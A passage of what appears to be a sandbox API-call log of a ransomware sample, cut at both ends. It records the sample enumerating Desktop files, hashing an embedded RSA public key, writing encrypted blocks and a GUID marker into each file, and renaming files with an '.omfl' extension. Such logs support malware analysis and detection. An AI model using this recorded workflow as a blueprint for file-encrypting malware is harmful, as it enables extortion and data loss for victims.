KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.268] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.269] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.270] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.270] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.270] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.270] GetLastError () returned 0x0 [0130.270] SetLastError (dwErrCode=0x0) [0130.271] GetLastError () returned 0x0 [0130.271] SetLastError (dwErrCode=0x0) [0130.271] GetLastError () returned 0x0 [0130.271] SetLastError (dwErrCode=0x0) [0130.271] GetLastError () returned 0x0 [0130.271] SetLastError (dwErrCode=0x0) [0130.271] GetLastError () returned 0x0 [0130.271] SetLastError (dwErrCode=0x0) [0130.271] GetLastError () returned 0x0 [0130.271] SetLastError (dwErrCode=0x0) [0130.271] GetLastError () returned 0x0 [0130.271] SetLastError (dwErrCode=0x0) [0130.271] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.271] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.271] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.271] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.271] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.271] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.271] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.272] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.273] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x10eb9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.273] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.273] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.273] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.273] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.274] CloseHandle (hObject=0x5c8) returned 1 [0130.276] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.276] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x7516fe8 [0130.276] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.276] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-eaO-tHkHlOr4BSUbCXv.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-eao-thkhlor4bsubcxv.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-eaO-tHkHlOr4BSUbCXv.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-eao-thkhlor4bsubcxv.swf.omfl")) returned 1 [0130.277] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.277] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.277] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.279] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.279] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd352d240, ftCreationTime.dwHighDateTime=0x1d5d902, ftLastAccessTime.dwLowDateTime=0x915d7ea0, ftLastAccessTime.dwHighDateTime=0x1d5d829, ftLastWriteTime.dwLowDateTime=0x915d7ea0, ftLastWriteTime.dwHighDateTime=0x1d5d829, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4X55rYE2IFU7ol2j.jpg", cAlternateFileName="4X55RY~1.JPG")) returned 1 [0130.279] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.279] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.279] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4X55rYE2IFU7ol2j.jpg") returned=".jpg" [0130.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4X55rYE2IFU7ol2j.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4x55rye2ifu7ol2j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.279] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=6073) returned 1 [0130.279] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.282] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1793, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.282] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.283] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.283] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.283] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.283] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x17b9, lpOverlapped=0x0) returned 1 [0130.283] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.283] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.284] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.285] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.285] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.285] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.285] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.285] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.285] GetLastError () returned 0x0 [0130.285] SetLastError (dwErrCode=0x0) [0130.285] GetLastError () returned 0x0 [0130.285] SetLastError (dwErrCode=0x0) [0130.285] GetLastError () returned 0x0 [0130.285] SetLastError (dwErrCode=0x0) [0130.285] GetLastError () returned 0x0 [0130.285] SetLastError (dwErrCode=0x0) [0130.285] GetLastError () returned 0x0 [0130.285] SetLastError (dwErrCode=0x0) [0130.285] GetLastError () returned 0x0 [0130.285] SetLastError (dwErrCode=0x0) [0130.285] GetLastError () returned 0x0 [0130.285] SetLastError (dwErrCode=0x0) [0130.285] GetLastError () returned 0x0 [0130.285] SetLastError (dwErrCode=0x0) [0130.285] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.286] SetLastError (dwErrCode=0x0) [0130.286] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.287] GetLastError () returned 0x0 [0130.287] SetLastError (dwErrCode=0x0) [0130.288] GetLastError () returned 0x0 [0130.288] SetLastError (dwErrCode=0x0) [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.288] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.288] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.288] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.288] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.288] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.288] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.288] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.288] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.288] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x17c0) returned 0xdd27950 [0130.288] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.288] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2620 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a70 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2740 [0130.288] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a88 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b00 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b18 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.289] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b00 | out: hHeap=0x4970000) returned 1 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b18 | out: hHeap=0x4970000) returned 1 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b18 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16b00 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b18 | out: hHeap=0x4970000) returned 1 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b00 | out: hHeap=0x4970000) returned 1 [0130.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.290] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.290] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.290] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.290] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.290] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.290] GetCurrentThreadId () returned 0x618 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5620 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.290] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.291] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x17b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.291] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.291] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.291] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.291] CloseHandle (hObject=0x5c8) returned 1 [0130.296] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.296] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x7516fe8 [0130.297] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4X55rYE2IFU7ol2j.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4x55rye2ifu7ol2j.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4X55rYE2IFU7ol2j.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4x55rye2ifu7ol2j.jpg.omfl")) returned 1 [0130.299] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00b4ea0, ftCreationTime.dwHighDateTime=0x1d5e408, 